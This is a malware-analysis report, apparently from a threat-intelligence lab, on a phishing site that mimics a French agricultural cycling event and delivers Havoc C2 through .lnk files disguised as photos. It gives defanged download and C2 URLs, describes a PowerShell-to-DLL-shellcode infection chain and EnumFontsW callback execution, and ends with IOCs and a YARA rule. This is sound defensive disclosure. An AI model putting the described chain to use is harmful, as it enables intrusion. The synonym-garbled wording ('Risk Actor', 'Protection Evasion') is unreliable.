Key Takeaways
- Cyble Analysis and Intelligence Labs (CRIL) not too long ago recognized a phishing web site that intently mimics the official web site of the World Agricultural Biking Competitors (WACC).
- This misleading web site was crafted by a Risk Actor (TA) who replicated the authentic WACC web site with solely minor modifications, making it difficult for unsuspecting guests to distinguish between the 2.
- The World Agricultural Biking Competitors is an occasion held in France that goals to bridge the hole between the agriculture and sports activities industries. The timing and context recommend that the TA is probably going concentrating on stakeholders and members inside this particular area and sector, aiming to use the occasion’s reputation and relevance.
- The phishing marketing campaign was intentionally launched in July 2024, shortly after the true biking occasion concluded in June. By capitalizing on the occasion’s current conclusion, the TA added a “PHOTO” part to the phishing web site, attractive guests with the promise of occasion pictures and thereby luring these related to or within the competitors.
- To additional their malicious agenda, the TA lures customers into downloading a ZIP file that allegedly accommodates occasion pictures. Nevertheless, as a substitute of pictures, the ZIP file harbors three shortcut recordsdata (.lnk) disguised as pictures. When executed, these shortcuts set off a complicated an infection chain that finally delivers a Havoc C2.
- As soon as the Havoc C2 is executed, it makes an attempt to determine communication with an Azure Entrance Door area. This area is probably going getting used as a redirector, serving as an middleman that reroutes visitors to the precise Command and Management (C&C) server, the place the TA can execute additional malicious actions.
Overview
CRIL has recognized a phishing web site hosted at “wacc[.]picture” that’s masquerading because the official web site for the World Agricultural Biking Competitors. The TA answerable for this phishing web site has cloned the authentic web site, making solely minor alterations to its content material. The true biking occasion passed off from June seventh to ninth, after which the TA launched their assault marketing campaign.
The TA added a brand new part titled “PHOTO,” claiming to supply occasion pictures to lure guests. This addition seems to be a strategic transfer geared toward concentrating on people related to the occasion who could be desirous to view or obtain these pictures. The Determine beneath illustrates the looks of the phishing web site.
The determine beneath illustrates the brand new part added by the TA, which gives the choice to obtain a malicious ZIP file disguised as occasion pictures.
The ZIP file in query accommodates three shortcut recordsdata (.lnk) which might be disguised as pictures. When a person clicks on any of those shortcuts, a PowerShell script is executed. This script is designed to obtain authentic pictures and show them utilizing the Edge browser, thereby sustaining the phantasm of authenticity. Nevertheless, the script additionally downloads and executes a malicious DLL file within the background.
This DLL acts as a loader and hundreds shellcode that’s answerable for loading the Havoc C2. Havoc is a complicated post-exploitation Command and Management (C&C) framework. As soon as deployed, the Havoc C2 makes an attempt to connect with an Azure Entrance Door area, which the TA doubtless makes use of as a redirector to the precise C&C server. In the course of the evaluation, it was noticed that the C&C server was down, which hindered the flexibility to totally analyze the next phases of the assault.
This phishing web site additionally hosts an open listing containing varied malware payloads used to ship Havoc. The TA could also be swapping out payloads to raised goal their victims.
Technical Evaluation
The preliminary an infection begins when a person downloads a ZIP file from a phishing web site. This ZIP file accommodates three shortcut recordsdata disguised with .jpg extensions to seem as picture recordsdata, as depicted within the determine beneath.
Every of those shortcut recordsdata is designed to execute the identical operation. Upon execution, they make the most of conhost.exe to run a PowerShell script. This script initially downloads a authentic JPG file utilizing the Begin-Bitstransfer command, which serves as a decoy. Particularly:
- 1.jpg.lnk downloads from hxxps[:]//wacc.picture/wp-content/uploads/2024/1.jpg
- 2.jpg.lnk downloads from hxxps[:]//wacc.picture/wp-content/uploads/2024/2.jpg
- 3.jpg.lnk downloads from hxxps[:]//wacc.picture/wp-content/uploads/2024/3.jpg
These decoy pictures are positioned within the “AppDataLocal” listing. Subsequently, the script makes use of Microsoft Edge to open these pictures with the next command:
- cmd.”exe /C ‘C:Program Information (x86)MicrosoftEdgeApplicationmsedge.exe’ C:UsersUser_NameAppDataLocal[image_name].jpg;
The determine beneath reveals the decoy picture.
The PowerShell script for downloading and displaying the decoy pictures is illustrated within the determine beneath.
After this, the PowerShell script downloads a DLL file from “hxxps[:]//wacc.picture/wp-content/uploads/2024/KB.crdownload” and saves it within the Downloads folder, naming it “KB.half.” Then, it strikes this file to “AppDataLocal” and names it “KB.DLL.” Then, it makes use of the Unblockcommand to permit the execution of the downloaded file. The determine beneath reveals the PowerShell script for downloading DLL.
Now, this PowerShell script hundreds the “KB.DLL” into its course of after which invokes the Run methodology throughout the DLL to provoke its execution. The determine beneath reveals the code for loading the DLL file.
This “KB.DLL” is a shellcode loader. It accommodates obfuscated shellcode and a dictionary of phrases mapped to bytes. A perform named DecodeWordsToBytes() reverses this knowledge, changing the phrases again into their unique byte values.
After de-obfuscating the shellcode, the ExecuteShellcode() methodology known as to execute it. This methodology allocates executable reminiscence, copies the shellcode into it, after which exploits the EnumFontsW() perform to run the shellcode underneath the pretext of enumerating fonts. Since EnumFontsW() is a callback perform, the pointer to the shellcode is handed to it for execution. The tactic then cleans up by releasing the gadget context. It is a widespread approach utilized in malware to execute payloads whereas trying to keep away from detection. The shellcode accommodates an embedded executable, as proven within the determine beneath.
This shellcode, upon execution, searches for the PE header as depicted within the determine beneath. Embedded throughout the shellcode is a HAVOC C2, which is loaded and designed to determine a connection to the area egzklpzltbptmgnnevne[.]azurefd.web. This area is linked to Azure Entrance Door, a content material supply community (CDN) service supplied by Microsoft Azure. TAs have beforehand been noticed abusing comparable authentic providers to evade detection. On the time of study, this area was down, which prevented additional investigation of subsequent phases.
Conclusion
This assault appears to have been intentionally aimed on the French agricultural sector. Though the command and management (C&C) server was inactive throughout the evaluation, stopping a whole understanding of the risk actor’s targets, there are a number of potential implications primarily based on the an infection chain that was noticed.
The deployment of the Havoc signifies that the TA doubtless supposed to hold out intensive and complicated operations. Havoc, as a post-exploitation framework, is able to enabling a spread of malicious actions. These may embrace lateral motion throughout the compromised community, permitting the attacker to infiltrate further methods, establishing persistence to make sure long-term entry, and deploying additional malware payloads to deepen the compromise or obtain particular targets. The sophistication of the Havoc framework means that the attacker was well-prepared and probably had a strategic curiosity in compromising methods throughout the French agricultural trade.
Our Suggestions
- The TA has created a phishing web site posing as Waac. To guard your self, confirm the legitimacy of internet sites by scrutinizing URLs and avoiding suspicious hyperlinks.
- Conduct coaching periods to coach customers on recognizing phishing makes an attempt and the dangers of downloading recordsdata from untrusted sources. Emphasize the significance of verifying the legitimacy of internet sites and hyperlinks earlier than interplay.
- Configure PowerShell execution insurance policies to limit the working of scripts from untrusted sources. Use instruments like PowerShell Constrained Language Mode to restrict PowerShell capabilities and cut back the danger of malicious script execution.
- Deploy superior endpoint safety options that may detect and block malicious DLLs and scripts. Make sure that the antivirus and antimalware software program utilized by your agency is up-to-date and configured to scan for probably dangerous recordsdata.
- Arrange community monitoring to detect uncommon visitors patterns, comparable to connections to suspicious domains or surprising communications with Azure Entrance Door domains. Examine any anomalies promptly.
MITRE ATT&CK® Methods
Tactic | Method | Process |
Preliminary Entry (TA0001) | Phishing (T1566) | Makes use of phishing web site. |
Execution (TA0002) | Consumer Execution: Malicious File (T1204.002) | The person executes a .LNK file disguised as a picture. |
Execution (TA0002) | Command and Scripting Interpreter: PowerShell (T1059.001) | Embedded PowerShell instructions executed |
Protection Evasion (TA0005) | Masquerading: Masquerade File Sort (T1036.008) | LNK file disguised as a JPG file |
Protection Evasion (TA0005) | Obfuscated Information or Data (T1027) | Accommodates obfuscated shellcode. |
Command and Management (TA0011) |
Software Layer Protocol: Net Protocols (T1071.001) | Makes use of HTTP to speak. |
Indicators of Compromise (IOCs)
Indicators | Indicator Sort |
Description |
7566a8bce13dcbf1137b44776711ac2c471cf54a8bd7891c5b00b091f2aaa796 | SHA256 | GAGNANTS_CONCOURS_2024.zip |
da9122c56c0da8f4e336f811435783b22994a9109162f3be6558aed7ac1c08da | SHA256 | 1.jpg.lnk |
3a169ce08fa1ab70f452c2bdfe3638805579a5cca1b45eb8ce81f68c98c932da | SHA256 | 2.jpg.lnk |
43cfef5db47162dda0c11320d3fcee76ef83308a7d0b7c9afd16c8dd974834a7 | SHA256 | 3.jpg.lnk |
d9b4ed0f77045b79989b31fa32fdb1b461e9602d0c150a4052f9ae6a79a98ff5 | SHA256 | KB.dll |
Yara Rule
rule Loader_Havoc{
meta:
creator = “Cyble Analysis and Intelligence Labs”
description = “Detects Dll loader used to ship Havoc payload”
date = “2024-08-14”
os = “Home windows”
strings:
$a1 = “ExecuteShellcode” fullword ascii
$a2 = “GetDCEx” fullword ascii
$a3 = “EnumFontsW” fullword ascii
$a4 = “ReleaseDC” fullword ascii
situation:
uint16(0) == 0x5A4D and all of them
}
Associated